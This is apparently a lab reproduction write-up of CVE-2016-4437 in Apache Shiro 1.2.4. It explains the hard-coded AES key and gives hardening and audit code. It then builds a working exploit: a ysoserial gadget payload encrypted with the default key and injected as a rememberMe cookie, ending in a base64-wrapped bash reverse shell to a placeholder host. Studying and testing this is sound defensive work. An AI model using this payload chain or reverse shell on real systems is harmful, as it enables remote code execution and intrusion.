CVE-2016-4437 Reproduction

Contents
  1. Environment setup
  2. Generate payload
  3. Execution
  4. Reverse shell

Overview

Apache Shiro 1.2.4 deserialization vulnerability

Affected versions: Apache Shiro <= 1.2.4

Cause: Apache Shiro uses CookieRememberMeManager by default, and its cookie handling flow is: read the rememberMe cookie value -> Base64 decode -> AES decrypt -> deserialize. Because the AES key is hard-coded, an attacker can craft malicious data and trigger a deserialization RCE.

Code analysis

In org.apache.shiro.mgt.AbstractRememberMeManager, line 26 hard-codes the AES key:

public abstract class AbstractRememberMeManager implements RememberMeManager {
    private static final Logger log = LoggerFactory.getLogger(AbstractRememberMeManager.class);
    private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");
    private Serializer<PrincipalCollection> serializer = new DefaultSerializer();
    private CipherService cipherService = new AesCipherService();
    private byte[] encryptionCipherKey;
    private byte[] decryptionCipherKey;

At lines 156 and 167, both the encryption and the decryption of the serialized data use this same key:

    protected byte[] encrypt(byte[] serialized) {
        byte[] value = serialized;
        CipherService cipherService = this.getCipherService();
        if (cipherService != null) {
            ByteSource byteSource = cipherService.encrypt(serialized, this.getEncryptionCipherKey());
            value = byteSource.getBytes();
        }

        return value;
    }
    protected byte[] decrypt(byte[] encrypted) {
        byte[] serialized = encrypted;
        CipherService cipherService = this.getCipherService();
        if (cipherService != null) {
            ByteSource byteSource = cipherService.decrypt(encrypted, this.getDecryptionCipherKey());
            serialized = byteSource.getBytes();
        }

        return serialized;
    }
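The following is an added example (not from the original post or the Shiro project) showing, in Java, the weak default configuration beside a hardened one that sets a fresh random key, plus an audit helper that checks whether a rememberMe cookie issued by your own deployment still decrypts under the 1.2.4 default key shown above. It assumes the shiro-web artifact (for CookieRememberMeManager) in addition to shiro-core; the class and method names are mine.

```java
import org.apache.shiro.codec.Base64;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.crypto.CryptoException;
import org.apache.shiro.web.mgt.CookieRememberMeManager;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;

public class RememberMeHardening {
    // Default key shipped in Shiro <= 1.2.4 (DEFAULT_CIPHER_KEY_BYTES); used here only to audit.
    private static final byte[] DEFAULT_KEY = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");
    // Header every Java serialization stream starts with: STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005
    private static final byte[] STREAM_HEADER = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05};

    /** Weak setup: no key configured, so Shiro 1.2.4 falls back to the hard-coded default key. */
    public static DefaultWebSecurityManager weakSecurityManager() {
        DefaultWebSecurityManager sm = new DefaultWebSecurityManager();
        sm.setRememberMeManager(new CookieRememberMeManager());
        return sm;
    }

    /** Hardened setup: a random 128-bit AES key generated at startup replaces the default key. */
    public static DefaultWebSecurityManager hardenedSecurityManager() {
        CookieRememberMeManager rmm = new CookieRememberMeManager();
        byte[] key = new AesCipherService().generateNewKey().getEncoded();
        rmm.setCipherKey(key); // sets both the encryption and the decryption key
        DefaultWebSecurityManager sm = new DefaultWebSecurityManager();
        sm.setRememberMeManager(rmm);
        return sm;
    }

    /**
     * Audit helper: take a rememberMe cookie value issued by our own application and run the
     * same Base64 decode -> AES decrypt pipeline with the default key. If the result begins with
     * a Java serialization header, the deployment is still using the Shiro 1.2.4 default key.
     */
    public static boolean issuedUnderDefaultKey(String rememberMeCookie) {
        try {
            byte[] plain = new AesCipherService()
                    .decrypt(Base64.decode(rememberMeCookie), DEFAULT_KEY).getBytes();
            if (plain.length < STREAM_HEADER.length) return false;
            for (int i = 0; i < STREAM_HEADER.length; i++) {
                if (plain[i] != STREAM_HEADER[i]) return false;
            }
            return true;
        } catch (CryptoException | IllegalArgumentException e) {
            return false; // a wrong key fails AES-CBC padding; malformed input fails decoding
        }
    }
}
```

In a cluster every node must share the same generated key (otherwise rememberMe cookies from one node are rejected by the others), and the key must be kept out of source control; Shiro 1.2.5 and later generate a random key at startup when none is configured, which is the upstream fix for this CVE.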

Reproduction

Environment setup

Here I use the vulhub/shiro:1.2.4 image, forwarding port 8080 of the container to port 8080 on the host; see vulhub for the setup steps.

Generate payload

Here I use the deserialization tool ysoserial with the payload set to `touch /tmp/test`; the command is `java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/test" > ~/poc.ser`. Then create a Maven project in IDEA and add the dependencies:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>CVE-2016-4437</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>

    <dependencies>
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.12</version>
            <scope>compile</scope>
        </dependency>
        <dependency>
            <groupId>org.apache.shiro</groupId>
            <artifactId>shiro-core</artifactId>
            <version>1.2.4</version>
        </dependency>
    </dependencies>

</project>

Put the previously generated poc.ser file into the project directory; my project layout is shown below:

[Screenshot: project directory layout]

Now process poc.ser to produce the encrypted, Base64-encoded form of the serialized data that the cookie expects. The code is as follows:

import org.apache.shiro.codec.Base64;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

import java.nio.file.Files;
import java.nio.file.Paths;

import org.junit.Test;

public class gen {
    @Test
    public void REC() throws Exception {
        // Serialized gadget chain produced by ysoserial (poc.ser in the project root)
        byte[] payload = Files.readAllBytes(Paths.get("poc.ser"));
        // Same cipher service and default key as Shiro 1.2.4's AbstractRememberMeManager
        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));

        // AES-CBC encrypt; ByteSource.toString() returns the Base64 form used as the cookie value
        ByteSource cipherText = aes.encrypt(payload, key);
        System.out.println(cipherText);
    }
}

Run it; the Base64 string it prints is the payload used in the next step.


Execution

Open http://localhost:8080, start Burp to capture traffic, tick "remember me", and inspect the request and the response:

[Screenshots: login request and response]

In the request's Cookie header, add a rememberMe field whose value is the payload generated earlier:

[Screenshot: modified request with the rememberMe cookie]

Enter the Docker container to check the effect.

Before execution:

[Screenshot: container before the request]

After execution:

[Screenshot: container after the request]

The command was executed successfully.

Reverse shell

The command is `bash -i >& /dev/tcp/ip/port 0>& 1`; note that there must be no space between `>` and `&`. Here the payload has to be converted into the Runtime.exec form; after conversion it is:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JiAx}|{base64,-d}|{bash,-i}

nc listener:

[Screenshot: nc listener]
